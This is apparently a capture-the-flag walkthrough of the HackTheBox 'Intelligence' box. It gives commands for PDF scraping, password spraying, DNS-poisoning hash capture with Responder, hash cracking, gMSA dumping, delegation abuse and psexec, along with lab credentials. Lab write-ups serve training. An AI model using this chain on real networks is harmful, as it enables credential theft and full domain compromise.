- 10.10.10.248 : IP of Box
- 10.10.14.3 : Local tun0
Enumeration process omitted from the movie
Enumerate anonymous logon (crackmapexec)
cme smb 10.10.10.248 -u 'a' -p ''
00:56 prepare shell script to download PDFs hidden
1st key is getting hidden PDFs.
Looking at file names from Download document page, you guess there should be other PDF files not shown on the web site.
So I prepared a shell script to execute wget for multiple PDFs.
#!/bin/zsh
for N in `seq 953 -1 1`
do
DATE="http://10.10.10.248/documents/"`date +%Y-%m-%d --date "${N} days ago"`"-upload.pdf"
echo $DATE
if [ $N -eq 223 ]
then
break
fi
done
save output into list.txt then
for i in $(cat ../list.txt); do wget $i; done
I first tried below
![](https://nekocyber.com/wp-content/uploads/2022/08/wget_script1-1024x336.png)
Then execute like below
![](https://nekocyber.com/wp-content/uploads/2022/08/wget_command2-e1660293990467.png)
It did not work.
01:11 pdftotext
use pdftoext on multiple PDFs.
sudo apt-get install poppler-utils
for file in *.pdf; do pdftotext "$file" "$file.txt"; done
01:24 Get Creator’s names from PDF as user names
use exiftool. Install guide here.
DL tar.gz file
cd <download directory>
gzip -dc Image-ExifTool-12.44.tar.gz | tar -xf -
cd Image-ExifTool-12.44
exiftool get meta info like creator, create date of PDF file.
exiftool -Creator -csv *pdf | cut -d, -f2 | sort | uniq > userlist
01:29 kerbrute using password and user names found
There are 2 kerbrute.
https://github.com/ropnop/kerbrute
2nd one is used here.
At /home/kali (home directory)
go install github.com/ropnop/kerbrute@latest
Then we have /home/kali/go/bin/kerbrute
Need to add /home/kali/go/bin to $PATH
user.txt : list of user name. NewIntelligenceCorpUser9876: password found in PDF
kerbrute passwordspray --dc 10.10.10.248 -d intelligence.htb user.txt NewIntelligenceCorpUser9876
01:37 crackmapexec using password and user names found
crackmapexec = cme can be used as Active Directory enumeration tool.
crackmapexec smb 10.10.10.248 -u userlist -p NewIntelligenceCorpUser9876
01:46 smbclient with user name and password
Get SMB/CIFS resources from host as Tiffany with password
smbclient -L 10.10.10.248 -U Tiffany.Molina%NewIntelligenceCorpUser9876
01:50 smbclient with share names found
Get info on share name “IT”.
A service name takes the form //server/service
.
smbclient //10.10.10.248/IT -U Tiffany.Molina%NewIntelligenceCorpUser9876
02:18 read ps1 file
![](https://nekocyber.com/wp-content/uploads/2022/08/ps1_code-1024x387.png)
02:29 dnstool.py to send DNS add request
–record web-neko.intelligence.htb : record name needs to start with “web”
python dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-neko.intelligence.htb --data 10.10.14.3 --type A 10.10.10.248
10.10.10.248 : to have 10.10.10.248 as DNS server
02:43 Responder to capture return credential
ps1 scripts runs every 5 mins.
And return could take longer time.
I couldn’t get return long time, so I thought it failed, then tried to send requests several times.
Then I got multi return in a time.
03:00 hashcat to crack credential
-m 5600: netntlmv2 ( challenge-response authentication protocol that Windows clients use to authenticate to other Windows servers)
hashcat -m 5600 ted_hash /usr/share/wordlists/rockyou.txt
Local machine had 2GB memory.
Hashcat kept returning memory allocation error.
Then I tried John. It did not fail, but running after 20 mins.
john --format=netntlmv2 ted_hash
I gave up and had a new machine with 4GB memory. Then hash cat worked fine.
03:10 bloodhound to enumerate on Active Directory
bloodhound : LDAP query tool with graphics.
git clone https://github.com/fox-it/BloodHound.py
python BloodHound.py/bloodhound.py -c ALL -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248
make sure you have updated /etc/hosts.
04:20 ldapsearch to enumerate
ldapsearch -H ldap://10.10.10.248 -x -W -D "Ted.Graves@intelligence.htb" -b "dc=intelligence,dc=htb" > ldapsearch_result_Ted.txt
04:25 SVC_INT has AllowedToDelegate
“Attribute msds-allowedtodelegateto
identifies the SPNs of services the user spot
is trusted to delegate to (impersonate other domain users) and authenticate to – in this case, it’s saying that the user spot is allowed to authenticate to CIFS service on DC01 on behalf of any other domain user:” from here.
04:34 gMSADumper.py
gMSADumper.py get gMSA password with Ted’s account, because Ted is in ITSUPPORT group, and this group can read password of SVC_INT.
python /home/kali/gMSADumper/gMSADumper-main/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
04:43 getST.py to send ticket request as Administrator
# If you have tickets cached (run klist to verify) the script will use them
# ./getST.py -k -spn cifs/contoso-dc contoso.com/user
# Be sure tho, that the cached TGT has the forwardable flag set (klist -f). getTGT.py will ask forwardable tickets
# by default.
#
# Also, if the account is configured with constrained delegation (with protocol transition) you can request
# service tickets for other users, assuming the target SPN is allowed for delegation:
# ./getST.py -k -impersonate Administrator -spn cifs/contoso-dc contoso.com/user
python /usr/share/doc/python3-impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :ee6ba16bad56e4fd9cc2a4156710cd2d -impersonate administrator
04:50 ntpdate to fix clock skew too great
sudo apt install ntpdate
sudo ntpdate 10.10.10.248
04:58 klist to confirm ticket
Displays a list of currently cached Kerberos tickets.
05:03 psexec.py
python /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass dc.intelligence.htb
group.add_argument(‘-no-pass’, action=”store_true”, help=’don\’t ask for password (useful for -k)’)
group.add_argument(‘-k’, action=”store_true”, help=’Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line’)